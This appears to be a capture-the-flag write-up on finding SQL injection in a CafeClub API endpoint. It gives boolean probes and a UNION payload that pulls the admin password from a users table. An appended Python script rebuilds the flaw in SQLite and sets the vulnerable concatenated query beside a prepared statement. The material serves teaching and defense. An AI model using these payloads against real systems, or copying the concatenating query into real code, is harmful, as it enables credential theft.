CafeClub
Our challenge's hint is SQLi. So let's see where a dev has forgotten to use prepared statements. 😃
My approach today was to hit as many endpoints as I could and check afterwards which of them could be considered endpoints that talk to a database. Once I thought I had clicked all the buttons, I returned to Burp Suite and highlighted all the interesting requests. However, not a single endpoint I'd hit would respond to the basic payload '+and+1=1-- +-. Maybe I needed to try some different payloads? I tried changing the + for %20, but that did not work either. Eventually I ended up retesting an endpoint, kind of forgot to URL-encode it, and also forgot to add ' at the beginning of my payload. But...

I got a response back! I quickly tested it with a false statement.

I think I found the entry point!
Always try different variations of your payload: URL-encoded with + or with %20, not URL-encoded at all, and prefixed with ', with ", or with nothing.
I used SQLMap to confirm the SQLi with this command.
After SQLMap ran, I found the users table of the application.

Another quick way is to send the payload directly: GET /api/products/16 union select null,password,null,null,null,null,null,null from users where username='admin'-- -. The UNION has to return the same number of columns as the products query does (eight here), and the password is placed in a column that the endpoint echoes back.
There I found that the admin's password was my flag 🇧🇪
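The request pattern from this writeup, rebuilt as an added example (this is not code from the challenge or from the original post): an in-memory SQLite database with a constructed products and users schema, the concatenating lookup that makes 16 and 1=2-- - and the UNION payload work, the prepared-statement lookup that does not, and the true/false comparison used above to confirm the injection. Table and column names, the product rows and the sample flag are all assumptions; only the shape of the payloads comes from the writeup.

```python
"""Added example (not the CafeClub challenge's code): the injection the writeup
exploits, rebuilt against an in-memory SQLite database, next to the
prepared-statement version it hints at. Schema, column names and data are
constructed assumptions; only the payload shapes come from the writeup."""
import sqlite3

# Constructed schema: products gets eight columns so that the writeup's
# UNION payload (eight SELECT items, password in the second slot) lines up.
SCHEMA = """
CREATE TABLE products (
    id INTEGER PRIMARY KEY, name TEXT, description TEXT, price REAL,
    image TEXT, category TEXT, stock INTEGER, created_at TEXT
);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO products VALUES
    (16, 'Espresso', 'Short and strong', 2.50, 'espresso.png', 'coffee', 40, '2023-01-01'),
    (17, 'Latte', 'Milky', 3.20, 'latte.png', 'coffee', 25, '2023-01-02');
INSERT INTO users VALUES
    (1, 'admin', 'FLAG{constructed_sample_flag}'),
    (2, 'alice', 'hunter2');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_product_vulnerable(conn, product_id):
    # The forgotten prepared statement: the path segment after /api/products/
    # is pasted straight into the SQL text, so anything after "16" is parsed as SQL.
    sql = "SELECT * FROM products WHERE id = " + str(product_id)
    return conn.execute(sql).fetchall()


def get_product_safe(conn, product_id):
    # Bound parameter: the whole segment is compared as one value, never parsed.
    # A real handler would also reject a non-integer id before the query runs.
    return conn.execute("SELECT * FROM products WHERE id = ?", (product_id,)).fetchall()


def boolean_probe(fetch, conn, base_id):
    # The writeup's confirmation step: a true and a false condition appended to
    # the same id. Different responses mean the database evaluated the condition.
    true_rows = fetch(conn, f"{base_id} and 1=1-- -")
    false_rows = fetch(conn, f"{base_id} and 1=2-- -")
    return true_rows != false_rows


# The writeup's UNION payload, minus the "GET /api/products/" request prefix.
UNION_PAYLOAD = ("16 union select null,password,null,null,null,null,null,null "
                 "from users where username='admin'-- -")


def extract_admin_password(fetch, conn):
    # Pick out the row that came from the UNION branch: the first column is NULL
    # (a real product always has an id) and the second column carries the password.
    for row in fetch(conn, UNION_PAYLOAD):
        if row[0] is None and row[1] is not None:
            return row[1]
    return None


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, boolean probe differs:", boolean_probe(get_product_vulnerable, conn, 16))
    print("safe, boolean probe differs:     ", boolean_probe(get_product_safe, conn, 16))
    print("vulnerable, UNION leak:", extract_admin_password(get_product_vulnerable, conn))
    print("safe, UNION leak:      ", extract_admin_password(get_product_safe, conn))
```

With the bound parameter the entire string "16 and 1=2-- -" is compared against the integer id and matches nothing, so the true and false probes return the same empty result and the UNION branch never exists; the concatenating version behaves exactly as the writeup describes.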